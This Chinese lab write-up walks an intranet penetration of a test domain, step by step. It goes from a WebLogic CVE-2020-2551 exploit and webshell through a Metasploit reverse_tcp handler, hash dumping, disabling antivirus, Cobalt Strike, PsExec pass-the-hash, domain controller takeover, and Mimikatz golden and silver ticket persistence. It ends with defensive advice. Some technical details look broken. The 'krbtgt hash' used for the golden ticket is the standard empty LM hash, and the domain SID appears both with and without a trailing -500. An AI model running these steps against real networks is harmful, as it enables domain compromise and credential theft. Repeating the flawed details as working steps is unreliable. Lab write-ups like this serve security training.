记一次内网渗透2
字数 1493 2025-08-23 18:31:34
内网渗透实战教学:从Weblogic漏洞到域控攻陷
环境搭建
实验环境配置
- 攻击机:Kali Linux
- 目标网络:
- Windows 2008 Server(提供Web服务)
- Windows 2012 Server(域控制器DC)
- Windows 7(PC机)
网络配置
- PC机(Windows 7) IP: 192.168.111.201
- Kali攻击机与目标机在同一网段
服务配置
- Windows 7上启动Weblogic服务
信息收集阶段
端口扫描
使用Nmap进行初步探测:
nmap -sS -sV 目标IP
发现开放端口:
- 80 (HTTP)
- 1433 (MSSQL)
- 3389 (RDP)
- 7001 (Weblogic管理端口)
Web服务识别
访问Web服务发现Weblogic管理界面,版本可能存在漏洞。
漏洞利用阶段
Weblogic反序列化漏洞(CVE-2020-2551)
-
漏洞验证:
- 使用专用工具探测CVE-2020-2551漏洞
- 确认存在漏洞后尝试命令执行
-
初始命令执行:
whoami成功返回当前用户权限
-
内存马注入:
- 通过漏洞注入内存马
- 获取初步Webshell
Webshell中转
- 使用哥斯拉(Godzilla)的Webshell中转功能
- 将Shell转移到Metasploit框架上
内网渗透阶段
Metasploit利用
-
建立监听:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST [kali IP] set LPORT 4444 exploit -
获取Meterpreter会话:
- 成功获取目标系统Shell
- 进行进程迁移以避免被检测
-
凭证收集:
hashdump获取系统本地用户哈希
远程桌面(RDP)利用
- 使用获取的凭证尝试RDP登录
- 登录后关闭杀毒软件
Cobalt Strike转移
- 上传CS的Payload
- 将Shell从MSF转移到Cobalt Strike
- 开始内网横向移动
域渗透阶段
域信息收集
-
使用CS内置功能:
- 扫描内网其他主机
- 收集开放端口信息
- 抓取域内凭证
-
关键信息:
- 域名称: de1ay
- 域计算机名称: web.de1ay.com
- 域SID: S-1-5-21-2756371121-2868759905-3853650604-500
横向移动
-
使用PsExec横向移动:
- 利用获取的哈希进行传递哈希攻击
- 横向移动到其他主机
-
域控攻陷:
- 通过抓取的域管理员哈希横向到域控制器
- 获取域控完全控制权限
权限维持
黄金票据制作
-
获取KRBTGT账户哈希:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee -
使用Mimikatz制作黄金票据:
mimikatz # kerberos::golden /admin:Administrator /domain:de1ay /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:aad3b435b51404eeaad3b435b51404ee /ticket:golden.kirbi
白银票据制作
前提条件:
- 已控制域控并使用域管理员登录或提权至SYSTEM
- 目标:访问Windows Server 2003机器
所需信息:
- 域名: de1ay
- 域SID: S-1-5-21-2756371121-2868759905-3853650604-500
- 目标服务器名: web.de1ay.com
- 服务账号NTLM hash: 73805069e2c7227f110772875f1b0e41
攻击流程图总结
- 外部渗透 → Weblogic漏洞利用 → 获取Webshell
- Webshell中转 → Meterpreter会话
- 凭证收集 → RDP登录 → 关闭防护
- 转移到Cobalt Strike → 内网探测
- 横向移动 → 域控攻陷
- 权限维持 → 黄金/白银票据制作
防御建议
-
Weblogic防护:
- 及时安装安全补丁
- 限制管理界面访问IP
-
内网防护:
- 启用LSA保护
- 限制PsExec使用
- 监控异常票据活动
-
权限管理:
- 定期更改KRBTGT账户密码
- 实施最小权限原则
-
监控措施:
- 部署EDR解决方案
- 监控异常哈希传递行为
- 建立完善的日志审计机制